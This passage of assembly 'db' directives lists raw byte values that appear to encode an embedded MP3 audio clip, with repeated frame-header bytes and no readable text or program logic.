83,150,207,11,46,51,165,140,241,85,139,161,253,191,77,82 + db 255,227,20,196,163,6,128,74,239,32,105,76,12,138,130,12 + db 107,186,55,221,200,185,76,167,59,116,125,218,142,99,238,231 + db 67,146,199,213,221,74,164,19,32,40,240,227,7,24,98,135 + db 255,227,20,196,172,7,128,74,239,32,17,146,4,4,216,91 + db 251,13,197,140,40,64,13,134,5,106,115,33,239,255,247,127 + db 255,246,190,138,94,93,250,38,209,212,225,48,8,5,2,138 + db 255,227,20,196,177,7,64,74,235,37,73,0,0,169,67,172 + db 223,233,255,232,255,161,8,65,44,234,51,160,212,7,18,107 + db 228,4,165,234,124,247,99,191,246,255,237,200,182,84,32,162 + db 255,227,20,196,183,13,1,186,231,33,140,40,0,137,106,60 + db 143,128,204,154,180,61,16,118,176,18,245,3,68,192,90,221 + db 255,255,255,173,236,207,47,255,9,255,134,1,213,201,152,251 + db 255,227,20,196,166,16,1,226,231,161,137,40,0,65,64,115 + db 125,111,227,128,224,207,70,255,255,232,67,129,129,159,222,143 + db 252,135,208,27,47,64,48,177,180,126,165,0,140,80,223,231 + db 255,227,20,196,137,6,64,58,255,33,201,0,0,157,255,68 + db 255,174,223,247,255,107,26,75,107,244,83,66,48,128,83,80 + db 96,175,19,142,81,127,52,2,15,111,231,1,219,254,171,255 + db 255,227,20,196,147,5,65,167,15,32,40,4,244,118,255,159 + db 255,191,249,3,129,128,80,214,92,48,243,220,35,171,127,80 + db 248,6,55,252,32,175,250,127,235,255,183,254,159,248,177,41 + db 255,227,20,196,161,5,241,163,7,32,56,5,45,251,32,130 + db 235,136,73,114,255,215,100,136,22,70,243,232,40,211,142,244 + db 127,226,87,255,254,162,188,136,42,80,90,72,26,248,23,179 + db 255,227,20,196,172,6,128,70,239,32,105,142,8,99,234,57 + db 135,233,7,225,213,97,94,150,89,16,174,112,59,183,220,168 + db 255,219,254,191,255,87,255,145,191,164,233,255,112,144,107,175 + db 255,227,20,196,181,6,193,86,251,32,64,4,236,221,131,228 + db 124,218,113,216,156,5,79,86,187,160,104,115,36,78,220,46 + db 15,148,138,69,194,194,207,72,202,223,180,185,254,183,63,211 + db 255,227,20,196,189,9,65,114,255,32,42,144,188,255,169,254 + db 75,147,193,39,9,201,5,52,17,36,74,4,177,137,36,188 + db 199,164,36,162,82,175,82,90,205,127,169,203,168,55,250,209 + db 255,227,20,196,187,7,1,111,7,32,8,10,104,255,245,19 + db 0,130,64,142,61,198,117,47,43,216,10,218,91,81,70,40 + db 237,167,15,159,255,114,131,27,212,8,74,2,0,128,13,254 + db 255,227,20,196,194,6,193,147,11,32,1,68,76,233,122,63 + db 210,248,99,19,93,62,147,43,14,139,220,255,44,136,15,47 + db 14,99,9,178,41,243,69,99,206,130,112,194,232,169,63,235 + db 255,227,20,196,202,6,128,90,255,32,9,76,72,85,56,210 + db 199,158,109,208,139,62,134,204,99,253,135,223,92,78,255,249 + db 63,229,111,163,98,118,71,198,166,202,117,26,96,154,212,69 + db 255,227,20,196,211,9,241,190,251,32,11,10,13,251,62,190 + db 104,142,3,192,36,137,191,158,113,191,234,88,239,234,62,119 + db 252,112,50,37,63,230,25,111,245,255,199,216,26,225,255,219 + db 255,227,20,196,206,8,192,98,255,32,98,14,68,143,146,71 + db 39,186,16,143,254,224,15,86,255,167,254,255,232,113,63,122 + db 48,175,140,245,157,231,11,127,219,165,65,50,27,230,12,142 + db 255,227,20,196,206,8,129,194,243,32,104,5,104,119,253,137 + db 238,255,247,253,167,16,213,22,32,26,61,255,228,209,64,91 + db 254,148,115,255,176,140,72,239,212,64,71,79,245,255,219,253 + db 255,227,20,196,207,9,128,54,227,53,79,0,0,4,183,244 + db 3,18,223,237,255,95,244,14,223,165,100,208,35,36,20,110 + db 29,63,222,192,181,127,234,39,212,255,119,250,1,167,101,31 + db 255,227,20,196,204,13,193,219,11,33,134,56,0,214,215,127 + db 21,17,63,95,151,12,16,66,234,76,128,241,178,242,22,212 + db 191,221,204,188,40,101,130,81,119,39,255,255,87,14,185,255 + db 255,227,20,196,184,10,193,187,3,33,197,56,0,254,210,42 + db 88,28,95,139,192,56,114,88,29,242,66,68,140,112,52,163 + db 195,1,143,79,253,63,250,198,254,115,241,119,3,71,2,239 + db 255,227,20,196,176,7,1,95,11,32,40,5,0,130,223,137 + db 195,13,249,206,68,75,57,83,254,98,24,175,255,221,63,156 + db 89,214,56,88,200,35,63,243,225,130,0,250,216,244,170,201 + db 255,227,20,196,183,6,193,43,3,32,16,5,4,15,202,34 + db 167,222,146,137,114,17,74,2,8,57,206,237,253,230,103,32 + db 134,95,204,12,32,114,1,6,6,12,119,32,84,251,190,151 + db 255,227,20,196,191,7,1,203,11,32,56,5,0,49,161,95 + db 178,21,36,175,20,216,54,232,163,160,244,38,49,255,249,174 + db 5,223,255,173,206,60,197,255,181,20,46,125,63,255,106,209 + db 255,227,20,196,198,7,128,131,11,32,57,132,76,191,155,82 + db 235,202,212,5,81,156,35,144,112,107,55,26,141,78,127,252 + db 240,184,81,152,223,255,208,231,255,232,36,134,223,252,168,151 + db 255,227,20,196,203,8,128,74,247,32,67,216,0,225,15,229 + db 56,8,115,162,253,192,181,142,6,167,201,118,211,253,255,252 + db 211,65,104,181,171,255,253,127,126,168,60,2,133,218,126,85 + db 255,227,20,196,204,7,192,54,247,32,81,158,4,58,248,51 + db 239,117,25,16,193,98,0,8,123,214,69,54,163,126,191,233 + db 126,114,128,238,218,141,142,250,34,136,198,41,139,244,47,150 + db 255,227,20,196,208,8,129,23,7,32,56,5,4,144,5,11 + db 172,88,153,50,55,90,56,130,251,17,0,216,255,250,61,68 + db 127,255,115,39,14,41,9,189,234,151,235,117,199,43,102,91 + db 255,227,20,196,209,9,64,255,15,32,16,4,164,254,175,174 + db 184,92,104,208,27,152,151,60,218,170,109,199,104,140,76,105 + db 36,159,180,68,89,149,84,146,76,167,38,40,116,251,255,126 + db 255,227,20,196,207,9,1,223,7,32,16,14,164,159,255,209 + db 142,7,51,38,145,100,89,177,135,228,106,75,61,127,251,152 + db 154,57,91,61,252,148,20,73,36,171,229,171,89,51,175,245 + db 255,227,20,196,206,8,65,90,255,32,40,14,196,105,241,191 + db 161,84,161,119,123,90,208,171,255,255,77,145,198,146,18,168 + db 40,249,16,41,46,217,23,55,18,140,2,21,38,60,1,234 + db 255,227,20,196,208,9,1,90,235,32,25,142,48,71,249,95 + db 3,176,193,104,127,158,16,8,68,109,106,52,6,114,69,143 + db 39,17,253,143,193,40,160,91,215,181,150,65,73,236,107,103 + db 255,227,20,196,207,7,192,210,239,32,48,70,176,176,225,82 + db 232,96,208,244,11,206,100,212,242,230,182,76,226,132,44,195 + db 223,244,68,223,67,156,139,101,223,49,121,238,11,4,235,71 + db 255,227,20,196,211,9,128,211,7,32,2,70,12,115,82,100 + db 171,75,210,28,88,128,246,131,28,147,208,69,69,148,40,72 + db 61,86,35,13,3,108,32,17,96,76,58,71,40,193,170,153 + db 255,227,20,196,208,9,0,215,11,32,72,76,48,77,174,30 + db 192,10,238,103,39,252,40,60,230,205,127,234,163,223,208,25 + db 62,134,250,7,190,130,66,46,98,129,206,180,231,239,208,143 + db 255,227,20,196,207,8,192,239,7,32,56,76,24,250,59,155 + db 224,206,127,79,90,149,63,41,127,79,229,47,212,41,103,136 + db 130,186,131,177,126,60,223,109,234,132,67,8,49,2,164,130 + db 255,227,20,196,207,8,192,74,235,33,79,0,0,0,208,72 + db 18,32,193,130,179,137,200,246,127,206,255,146,253,127,151,190 + db 162,14,211,195,167,0,129,64,50,38,217,20,81,112,28,186 + db 255,227,20,196,207,15,1,206,255,33,136,56,1,81,249,207 + db 253,255,255,254,93,39,97,134,86,239,79,212,12,5,32,117 + db 78,60,165,165,123,36,210,105,41,8,153,200,211,255,255,255 + db 255,227,20,196,182,12,129,19,19,33,131,40,0,245,61,33 + db 128,43,186,226,47,220,3,108,125,87,62,233,162,1,218,244 + db 23,74,33,218,78,84,37,61,33,31,169,63,212,254,238,221 + db 255,227,20,196,167,6,192,251,15,33,193,40,0,63,233,224 + db 18,158,76,72,133,112,226,247,9,207,44,248,73,35,248,235 + db 228,191,223,255,255,255,174,129,4,45,108,12,19,211,63,187 + db 255,227,20,196,175,7,1,31,7,32,16,5,32,171,196,73 + db 69,70,230,161,74,90,149,68,196,134,138,234,38,1,163,245 + db 239,214,73,29,71,22,40,50,48,192,231,189,143,90,164,45 + db 255,227,20,196,182,7,64,74,239,32,67,18,64,129,169,198 + db 21,16,127,18,248,251,183,80,140,40,46,250,219,255,219,247 + db 253,191,222,29,248,28,80,99,92,194,192,19,181,7,89,22 + db 255,227,20,196,188,6,192,66,255,32,11,12,4,225,46,175 + db 175,203,250,68,239,241,161,127,80,18,8,183,206,255,245,253 + db 28,159,44,238,75,67,31,76,5,231,10,5,95,91,171,34 + db 255,227,20,196,196,7,64,66,243,32,91,210,0,114,208,239 + db 171,106,164,102,105,84,198,117,86,18,0,128,207,229,18,223 + db 95,255,183,255,246,253,119,202,2,123,123,62,88,246,37,113 + db 255,227,20,196,202,7,64,78,243,32,96,82,64,226,191,253 + db 138,27,183,66,209,22,177,150,31,199,226,77,92,104,164,134 + db 15,3,95,139,157,160,92,153,223,175,87,42,230,35,24,99 + db 255,227,20,196,208,8,129,83,3,32,64,68,208,232,228,206 + db 90,48,164,243,205,254,198,55,101,100,67,102,255,247,116,44 + db 127,109,9,95,239,219,208,64,227,105,117,63,253,68,234,8 + db 255,227,20,196,209,9,1,83,11,32,40,5,40,203,66,66 + db 35,57,94,223,197,178,193,209,96,112,24,57,235,255,253,224 + db 31,168,88,126,34,158,140,169,108,161,95,242,225,142,59,123 + db 255,227,20,196,208,9,1,103,3,32,9,198,184,245,127,255 + db 237,18,255,255,242,161,63,133,112,26,13,213,166,128,71,173 + db 197,67,71,191,255,255,255,245,6,0,7,2,199,27,99,229 + db 255,227,20,196,207,8,193,98,251,32,56,5,32,235,227,32 + db 97,7,185,40,67,124,185,48,192,41,199,20,4,79,186,83 + db 65,255,225,247,42,57,200,192,148,217,149,42,10,140,60,92 + db 255,227,20,196,207,8,129,70,243,33,69,16,0,2,37,163 + db 95,254,174,241,165,42,53,39,55,96,152,18,241,53,24,147 + db 248,194,156,201,215,207,175,34,151,232,59,107,255,254,149,127 + db 255,227,20,196,208,14,1,178,255,33,139,56,1,196,10,177 + db 177,32,200,63,167,224,22,173,86,149,13,217,42,168,144,6 + db 13,22,127,252,69,137,66,96,171,139,81,18,141,223,255,248 + db 255,227,20,196,187,8,0,91,15,33,198,0,0,136,57,198 + db 52,1,170,56,176,251,171,145,26,71,91,31,160,9,255,21 + db 177,201,68,185,14,114,160,25,58,66,58,196,38,128,112,176 + db 255,227,20,196,190,6,64,91,3,32,43,12,0,38,244,127 + db 46,255,55,14,6,45,11,57,232,136,132,231,251,154,8,79 + db 52,71,32,1,124,148,199,255,72,233,221,194,8,40,215,130 + db 255,227,20,196,200,6,128,46,247,32,81,82,0,12,63,255 + db 250,255,250,200,32,88,178,21,253,60,223,177,133,55,147,138 + db 1,140,121,84,75,247,144,254,154,8,28,235,135,129,255,211 + db 255,227,20,196,209,9,128,82,247,32,72,88,68,205,116,97 + db 114,134,163,102,55,66,50,183,157,62,116,16,42,223,66,230 + db 251,126,135,96,162,90,48,201,105,64,25,194,214,53,93,62 + db 255,227,20,196,206,7,193,6,255,32,72,68,176,238,208,55 + db 168,220,3,1,211,150,48,161,234,123,166,113,99,223,213,127 + db 42,167,119,233,253,215,213,92,80,167,250,127,255,254,136,223 + db 255,227,20,196,210,9,64,98,235,32,59,6,16,144,102,194 + db 86,71,119,94,83,142,18,103,242,163,207,209,68,113,25,218 + db 157,254,255,209,12,254,64,160,65,212,168,55,200,114,46,165 + db 255,227,20,196,208,9,0,74,235,32,56,82,64,37,113,1 + db 211,31,194,35,234,208,21,163,72,212,118,232,83,47,212,1 + db 21,255,242,51,20,231,215,79,170,41,125,138,3,7,186,143 + db 255,227,20,196,207,9,65,46,255,32,24,71,40,7,255,247 + db 114,191,107,134,117,18,67,239,194,137,29,191,249,8,222,167 + db 251,39,36,130,203,100,127,209,20,243,205,255,255,226,18,239 + db 255,227,20,196,205,7,129,15,19,32,16,196,232,103,220,196 + db 125,134,127,155,251,8,63,223,234,229,223,9,137,63,157,186 + db 0,161,61,104,168,237,160,0,49,180,145,127,140,63,251,81 + db 255,227,20,196,210,9,129,11,11,32,10,68,4,127,74,255 + db 151,195,234,132,6,127,127,33,6,23,234,34,6,111,86,78 + db 18,15,61,62,36,27,213,144,72,51,233,118,242,4,133,191 + db 255,227,20,196,207,8,129,227,3,32,56,5,36,242,250,131 + db 146,223,155,91,209,219,62,66,150,205,85,75,212,72,60,1 + db 1,159,171,175,251,228,23,111,99,171,58,248,24,59,223,255 + db 255,227,20,196,208,9,129,51,11,32,56,5,64,242,95,223 + db 195,202,75,23,37,156,141,128,213,28,39,139,151,1,204,83 + db 182,113,123,17,229,254,94,238,85,206,255,187,229,239,89,171 + db 255,227,20,196,205,8,193,51,7,32,40,202,4,255,239,184 + db 174,89,250,175,126,189,55,27,50,72,139,53,51,140,10,167 + db 30,136,156,206,66,195,84,244,92,13,49,137,175,254,152,40 + db 255,227,20,196,205,9,1,87,7,32,18,15,64,8,15,18 + db 185,101,38,119,106,66,32,170,3,96,100,48,192,247,29,57 + db 43,229,255,249,47,244,159,2,7,133,7,177,221,160,111,240 + db 255,227,20,196,204,8,1,91,15,32,1,68,60,5,4,36 + db 184,60,189,81,2,117,28,6,131,183,255,241,111,255,255,85 + db 194,193,112,170,31,215,131,128,116,35,196,65,91,116,73,115 + db 255,227,20,196,207,9,65,91,7,32,8,138,140,1,129,87 + db 85,255,192,173,255,168,21,13,117,122,98,80,223,178,191,145 + db 232,6,199,198,61,231,223,31,79,156,172,201,239,191,168,255 + db 255,227,20,196,205,8,0,206,247,33,67,40,0,136,136,136 + db 93,174,255,33,241,2,67,157,38,255,243,198,133,37,195,250 + db 145,224,119,151,12,127,137,15,51,78,64,33,96,188,52,254 + db 255,227,20,196,208,16,65,226,255,33,140,64,0,146,12,135 + db 10,1,24,163,71,61,161,136,90,56,105,77,49,160,219,175 + db 171,242,145,255,254,217,190,191,159,74,203,215,90,51,43,162 + db 255,227,20,196,178,9,64,79,3,33,201,0,0,106,239,8 + db 255,221,168,13,1,161,140,45,168,24,74,63,223,255,255,255 + db 255,255,255,255,254,155,219,254,188,172,155,134,50,255,236,187 + db 255,227,20,196,176,6,128,55,7,32,72,204,36,236,21,71 + db 102,11,155,37,225,23,127,79,231,123,61,182,10,237,115,209 + db 239,162,72,137,232,153,162,255,237,155,26,172,46,218,83,139 + db 255,227,20,196,185,7,0,74,239,32,80,204,8,113,187,191 + db 244,255,254,83,255,254,125,126,180,74,240,247,186,158,157,246 + db 104,79,122,34,12,36,29,54,165,30,177,138,53,139,200,152 + db 255,227,20,196,192,10,128,206,231,33,75,24,0,173,60,225 + db 239,255,229,58,43,22,67,255,102,255,244,255,152,23,11,241 + db 27,13,192,51,11,18,20,41,212,141,104,206,255,251,237,255 + db 255,227,20,196,185,12,65,227,3,33,137,16,0,245,28,50 + db 150,37,127,106,232,192,216,193,108,74,148,56,25,240,128,1 + db 103,123,78,66,39,220,22,115,75,130,31,124,65,197,50,203 + db 255,227,20,196,171,7,65,219,3,33,194,16,0,220,163,58 + db 124,81,102,236,214,133,162,90,183,152,102,249,171,31,227,255 + db 103,45,125,0,103,50,9,11,68,90,22,26,248,154,151,215 + db 255,227,20,196,177,7,64,74,243,32,48,76,64,129,49,70 + db 148,122,108,77,150,176,92,134,69,156,185,107,85,209,207,246 + db 171,180,199,239,161,226,56,188,168,212,110,68,75,67,94,136 + db 255,227,20,196,183,7,65,86,231,32,48,4,196,88,243,196 + db 134,82,128,36,124,136,180,231,127,150,215,99,71,152,159,184 + db 225,75,131,226,177,159,199,115,187,67,43,146,255,107,158,127 + db 255,227,20,196,189,7,64,70,235,32,51,210,36,159,118,191 + db 187,246,194,113,17,90,66,82,98,49,4,19,191,145,50,226 + db 207,132,130,151,13,69,7,187,159,109,119,22,118,131,184,177 + db 255,227,20,196,195,7,0,74,235,32,59,196,4,91,102,109 + db 53,33,251,202,189,165,127,159,241,255,151,250,191,238,62,103 + db 232,41,10,63,243,127,105,196,155,231,33,71,112,67,171,211 + db 255,227,20,196,202,6,192,74,255,32,80,196,8,208,67,215 + db 201,245,57,127,56,68,251,168,33,37,235,119,251,189,221,141 + db 200,61,251,117,168,74,250,76,255,94,113,234,120,203,121,52 + db 255,227,20,196,210,8,192,162,239,33,79,40,0,72,138,11 + db 214,19,110,175,255,219,223,67,141,67,235,150,14,163,89,79 + db 112,64,7,157,96,65,135,137,43,75,174,240,130,137,111,108 + db 255,227,20,196,210,15,1,99,7,33,137,56,0,1,42,74 + db 145,30,245,159,86,31,228,141,55,197,221,250,186,138,127,190 + db 160,80,88,10,138,180,153,132,118,229,168,78,255,203,5,55 + db 255,227,20,196,185,13,193,99,15,33,131,64,0,77,5,235 + db 241,35,245,161,113,252,143,134,134,180,89,33,140,230,212,176 + db 152,191,241,229,183,233,48,175,9,7,171,80,61,255,234,242 + db 255,227,20,196,165,6,193,47,11,33,193,56,0,94,107,2 + db 2,228,108,224,88,222,35,93,150,75,98,45,126,234,248,202 + db 171,255,255,202,150,2,186,163,222,145,247,47,79,229,131,191 + db 255,227,20,196,173,6,128,155,15,32,8,4,96,15,178,118 + db 106,171,51,116,161,98,24,215,228,228,102,196,112,197,69,234 + db 119,34,138,139,159,249,8,197,74,183,251,253,24,223,219,77 + db 255,227,20,196,182,7,64,82,255,32,0,76,0,93,31,100 + db 177,207,167,150,15,251,8,62,78,120,247,55,163,20,242,2 + db 248,12,59,144,228,45,34,3,254,166,239,93,89,242,255,250 + db 255,227,20,196,188,7,192,119,15,32,1,132,16,255,255,255 + db 250,127,237,242,16,129,142,245,29,229,63,196,228,107,140,6 + db 10,212,243,243,7,20,2,10,125,242,86,127,255,250,189,76 + db 255,227,20,196,192,6,112,199,7,32,73,132,49,241,19,184 + db 132,239,18,255,207,65,80,96,111,55,27,107,104,129,225,105 + db 179,3,135,255,50,226,13,218,92,249,116,161,191,249,118,240 + db 255,227,20,196,201,7,0,195,7,32,56,5,0,7,120,125 + db 127,239,187,17,31,158,0,194,105,239,109,178,112,99,62,254 + db 162,95,111,167,253,219,252,165,42,83,220,5,255,33,68,187 + db 255,227,20,196,208,8,64,74,235,37,79,0,0,187,58,155 + db 224,47,132,83,190,45,130,224,91,76,98,92,141,56,69,170 + db 82,167,226,200,134,19,115,82,206,255,255,233,86,68,143,169 + db 255,227,20,196,210,11,233,203,7,33,137,40,1,255,220,6 + db 50,99,72,112,14,11,31,130,174,24,192,24,83,132,129,112 + db 29,98,172,19,254,32,0,2,112,24,130,100,88,91,255,247 + db 255,227,20,196,197,9,1,146,255,33,200,16,0,172,185,125 + db 42,192,143,103,103,170,17,203,19,30,255,36,202,160,17,147 + db 238,30,151,44,172,138,127,209,64,64,160,154,161,197,127,255 + db 255,227,20,196,196,7,0,86,251,32,16,76,0,213,182,165 + db 255,140,12,75,146,41,195,212,49,71,169,126,110,233,3,131 + db 254,103,213,169,67,109,79,252,206,224,2,212,97,117,68,43 + db 255,227,20,196,203,8,0,94,251,32,8,140,8,255,250,128 + db 159,224,21,224,152,99,172,241,17,141,255,177,163,195,103,250 + db 254,230,205,30,7,10,159,243,109,95,254,143,67,196,66,198 + db 255,227,20,196,206,9,1,78,251,32,51,196,160,185,223,254 + db 24,208,90,134,252,226,211,14,250,185,24,76,29,191,255,248 + db 128,95,247,253,42,112,1,14,20,49,223,201,124,200,168,191 + db 255,227,20,196,205,8,192,86,243,32,11,210,8,254,173,145 + db 158,161,54,242,13,10,23,1,69,159,231,130,95,206,243,119 + db 244,162,179,205,52,215,112,140,104,168,10,121,159,150,185,9 + db 255,227,20,196,205,8,128,55,7,32,18,70,0,163,255,8 + db 45,58,141,237,145,147,130,113,98,31,168,25,245,255,249,195 + db 137,79,255,254,223,57,16,230,18,48,128,65,11,87,159,49 + db 255,227,20,196,206,8,192,219,15,32,42,68,224,244,6,63 + db 175,255,3,34,33,112,232,24,159,85,189,158,29,26,101,181 + db 245,179,255,210,33,168,78,80,6,5,14,184,44,112,210,95 + db 255,227,20,196,206,8,193,3,3,32,42,196,224,247,171,163 + db 201,7,30,49,48,18,90,17,112,224,139,189,212,32,129,143 + db 36,27,24,41,70,86,255,234,255,163,66,138,80,171,180,255 + db 255,227,20,196,206,8,193,87,7,32,24,14,64,240,92,14 + db 0,161,148,49,39,102,128,159,172,208,178,191,94,180,160,172 + db 126,146,58,221,187,217,255,231,165,137,128,155,188,87,137,141 + db 255,227,20,196,206,7,193,91,7,32,40,5,96,160,7,229 + db 0,40,45,212,213,34,253,111,96,28,89,253,36,255,127,255 + db 213,191,167,255,251,255,42,125,174,49,254,169,84,102,252,247 + db 255,227,20,196,210,8,193,83,7,32,40,15,4,162,139,133 + db 128,60,244,229,73,247,170,0,225,113,159,114,228,223,250,127 + db 255,171,254,122,74,135,34,40,178,146,187,190,105,94,120,216 + db 255,227,20,196,210,9,129,90,251,32,18,68,136,171,8,210 + db 88,35,226,56,95,70,6,8,42,51,128,2,14,236,189,108 + db 251,169,57,169,171,52,65,225,128,112,4,97,12,16,46,157 + db 255,227,20,196,207,8,128,131,11,32,0,204,24,125,63,207 + db 189,185,158,45,92,4,199,83,255,237,14,122,89,66,206,106 + db 213,127,245,255,255,223,250,188,190,100,142,2,184,128,109,213 + db 255,227,20,196,208,8,64,115,11,32,9,132,8,57,184,162 + db 49,79,223,81,178,160,221,20,82,212,30,112,153,254,206,54 + db 118,79,243,118,255,253,255,255,230,127,220,18,135,54,2,218 + db 255,227,20,196,210,9,64,114,255,32,74,12,76,158,149,197 + db 127,202,65,82,201,152,18,85,233,66,54,30,112,52,104,93 + db 66,23,87,254,255,179,189,4,184,179,178,160,37,8,141,22 + db 255,227,20,196,208,8,193,226,255,32,74,4,16,122,220,229 + db 8,144,103,144,66,16,122,180,193,211,216,32,17,15,39,137 + db 16,165,127,187,187,191,67,134,151,74,118,199,166,55,88,230 + db 255,227,20,196,208,7,233,154,255,32,56,5,41,45,238,87 + db 65,5,34,56,194,126,37,65,57,19,97,49,18,145,218,106 + db 138,148,205,218,223,214,159,254,207,253,119,170,16,130,5,190 + db 255,227,20,196,211,9,128,131,11,32,8,196,16,183,67,95 + db 155,28,9,174,60,183,101,177,233,234,20,141,21,255,183,215 + db 215,213,211,255,255,255,253,237,254,175,2,28,206,119,64,140 + db 255,227,20,196,208,9,129,91,11,32,10,4,60,14,25,166 + db 72,11,211,13,146,221,156,58,114,128,214,242,65,204,222,106 + db 122,84,179,180,118,68,74,156,183,197,157,115,63,103,253,211 + db 255,227,20,196,205,8,129,123,3,32,56,5,0,186,85,234 + db 156,205,166,233,152,41,198,165,122,84,245,245,48,184,173,187 + db 255,34,32,127,215,249,32,0,165,32,65,30,226,162,191,241 + db 255,227,20,196,206,9,64,74,235,32,11,18,36,195,59,107 + db 82,44,145,253,119,234,198,243,202,0,81,54,232,19,6,206 + db 255,27,17,55,250,10,139,29,232,49,235,251,61,99,253,35 + db 255,227,20,196,204,8,0,58,243,32,16,204,0,127,212,51 + db 29,93,124,1,75,239,216,0,44,31,253,48,152,152,127,210 + db 53,111,251,15,86,75,245,151,199,63,252,132,255,223,255,40 + db 255,227,20,196,207,8,193,150,247,32,104,5,12,255,232,66 + db 1,63,171,127,65,175,213,100,1,126,28,219,231,97,175,239 + db 254,72,63,216,193,140,173,188,135,97,118,242,139,79,20,17 + db 255,227,20,196,207,9,65,170,255,32,96,4,96,63,88,84 + db 147,171,152,101,7,169,250,30,49,9,164,214,254,36,141,255 + db 235,255,162,255,220,102,255,170,72,10,255,206,51,255,51,253 + db 255,227,20,196,205,8,0,159,3,32,89,142,12,84,120,169 + db 204,108,22,143,104,4,97,26,58,234,32,22,246,1,67,24 + db 156,216,28,16,57,7,219,88,62,245,17,168,205,76,240,107 + db 255,227,20,196,208,8,1,7,3,32,72,70,236,125,141,241 + db 79,38,159,162,0,192,217,228,72,92,125,137,121,44,207,132 + db 131,124,75,45,87,145,255,118,175,234,8,191,137,223,226,15 + db 255,227,20,196,211,9,64,234,255,32,72,14,224,198,192,184 + db 6,170,99,118,211,97,144,92,198,79,24,66,248,89,41,253 + db 15,219,255,255,175,255,255,253,223,251,189,110,221,68,33,237 + db 255,227,20,196,209,9,193,202,247,32,27,74,212,235,122,191 + db 162,12,209,93,206,219,227,242,181,237,175,247,128,121,247,232 + db 67,255,191,254,103,254,175,255,178,255,142,16,59,250,14,5 + db 255,227,20,196,205,8,193,58,255,32,80,74,236,70,199,255 + db 161,131,223,142,135,62,189,8,191,91,163,30,35,140,171,42 + db 4,217,63,209,244,254,191,250,255,238,14,255,213,12,223,233 + db 255,227,20,196,205,8,65,202,247,32,8,20,4,103,255,65 + db 130,255,204,58,85,169,243,180,0,248,194,71,76,21,140,230 + db 111,186,48,165,133,103,150,37,200,197,229,124,11,105,16,89 + db 255,227,20,196,207,9,128,98,255,32,10,70,44,238,18,187 + db 254,160,239,8,243,131,67,212,64,16,120,146,85,120,52,89 + db 72,18,2,232,62,254,96,187,244,64,25,250,143,119,255,251 + db 255,227,20,196,204,7,64,99,11,32,2,68,16,45,255,209 + db 244,61,95,218,180,234,34,243,39,219,136,225,99,179,1,132 + db 197,236,134,49,172,19,252,88,49,143,9,167,154,103,219,200 + db 255,227,20,196,210,9,129,170,247,32,99,14,4,78,171,126 + db 122,77,83,204,177,24,225,79,233,65,227,59,156,164,34,104 + db 223,147,99,72,37,139,139,255,207,254,27,191,33,159,55,137 + db 255,227,20,196,207,9,129,210,251,32,88,14,224,16,142,145 + db 147,208,12,227,67,127,113,247,4,82,112,93,126,131,215,196 + db 51,57,228,60,159,66,13,38,170,224,75,21,30,15,12,188 + db 255,227,20,196,204,8,129,211,7,32,56,10,224,74,187,26 + db 104,194,78,220,37,220,138,140,28,12,64,113,200,122,254,232 + db 255,213,14,2,159,254,134,55,255,47,253,98,44,238,162,95 + db 255,227,20,196,205,9,0,155,7,32,17,132,44,35,193,9 + db 248,40,52,142,171,87,60,228,127,74,35,79,248,97,159,255 + db 224,128,95,196,236,255,206,122,4,255,244,80,17,37,100,244 + db 255,227,20,196,204,8,192,138,231,37,75,40,0,119,97,103 + db 196,73,223,26,111,231,119,9,159,254,186,19,255,255,163,191 + db 253,64,79,163,235,248,147,140,5,107,51,46,129,193,108,192 + db 255,227,20,196,204,14,1,106,255,33,137,80,0,184,179,233 + db 83,199,187,255,139,117,135,253,67,254,255,147,245,127,161,244 + db 89,184,25,172,52,114,124,104,183,255,63,66,55,254,223,245 + db 255,227,20,196,183,12,193,103,15,33,129,64,0,83,127,156 + db 234,159,253,127,242,168,237,237,67,122,149,176,181,191,114,63 + db 244,90,27,67,1,255,245,111,253,127,212,68,127,246,252,74 + db 255,227,20,196,167,7,1,43,15,33,194,40,0,154,255,205 + db 117,194,186,66,110,250,66,19,183,254,143,255,95,23,129,89 + db 123,255,170,41,166,155,249,175,77,2,64,217,166,47,255,191 + db 255,227,20,196,174,7,0,58,255,32,11,24,0,244,85,110 + db 197,218,223,242,71,120,56,178,104,40,255,34,173,27,232,39 + db 18,109,255,244,127,253,143,204,5,193,101,124,184,89,218,154 + db 255,227,20,196,181,8,1,83,11,32,72,202,44,28,56,112 + db 35,160,132,74,98,109,50,218,125,117,46,223,255,218,164,250 + db 255,229,255,211,215,255,221,28,161,72,163,231,41,204,25,215 + db 255,227,20,196,184,6,128,107,15,32,40,4,160,163,184,229 + db 133,158,6,2,194,148,206,78,18,156,167,132,117,65,176,193 + db 64,248,219,86,42,42,251,92,229,185,7,255,250,57,120,148 + db 255,227,20,196,193,7,1,199,19,32,40,5,32,98,25,47 + db 219,7,162,240,164,197,151,185,133,116,255,26,107,126,168,130 + db 235,60,178,167,48,13,79,136,191,255,221,237,234,63,232,152 + db 255,227,20,196,200,6,193,91,15,32,40,11,32,9,128,24 + db 181,225,46,19,144,152,47,246,68,177,21,196,1,79,147,234 + db 119,255,249,23,255,255,250,39,221,17,122,186,19,173,188,112 + db 255,227,20,196,208,9,129,218,251,32,10,84,133,49,231,147 + db 195,20,127,136,3,222,239,0,158,10,234,120,65,70,117,182 + db 167,128,27,253,23,211,244,255,237,255,81,253,229,157,226,158 + db 255,227,20,196,205,8,129,83,7,32,40,15,32,196,127,216 + db 21,21,175,185,53,174,112,22,132,65,133,1,234,145,108,31 + db 104,62,15,184,31,232,218,0,40,8,59,146,92,46,120,92 + db 255,227,20,196,206,8,1,163,3,32,0,196,81,25,13,59 + db 91,126,143,193,109,169,109,76,240,148,187,3,141,35,175,143 + db 46,103,48,101,168,242,136,190,84,239,201,217,202,187,191,163 + db 255,227,20,196,209,9,64,103,7,32,1,132,20,146,228,230 + db 228,60,64,83,232,57,60,179,131,84,71,76,249,240,137,224 + db 0,132,2,2,238,151,41,208,239,229,194,199,51,224,136,121 + db 255,227,20,196,207,7,192,98,255,32,11,6,16,186,127,254 + db 143,11,26,240,98,90,165,253,25,11,235,87,114,7,35,255 + db 114,104,255,66,20,119,43,33,189,4,2,97,149,157,122,217 + db 255,227,20,196,211,10,129,162,251,32,97,138,44,255,140,237 + db 191,33,5,51,194,191,69,114,189,74,18,28,223,234,170,70 + db 61,190,99,25,191,189,71,59,211,206,48,74,127,217,255,171 + db 255,227,20,196,204,7,193,75,3,32,56,68,12,255,220,162 + db 206,56,42,46,90,85,169,161,231,247,95,166,211,89,2,32 + db 114,132,168,245,255,154,134,154,10,11,64,79,245,255,168,215 + db 255,227,20,196,208,9,192,95,3,32,64,198,16,211,191,140 + db 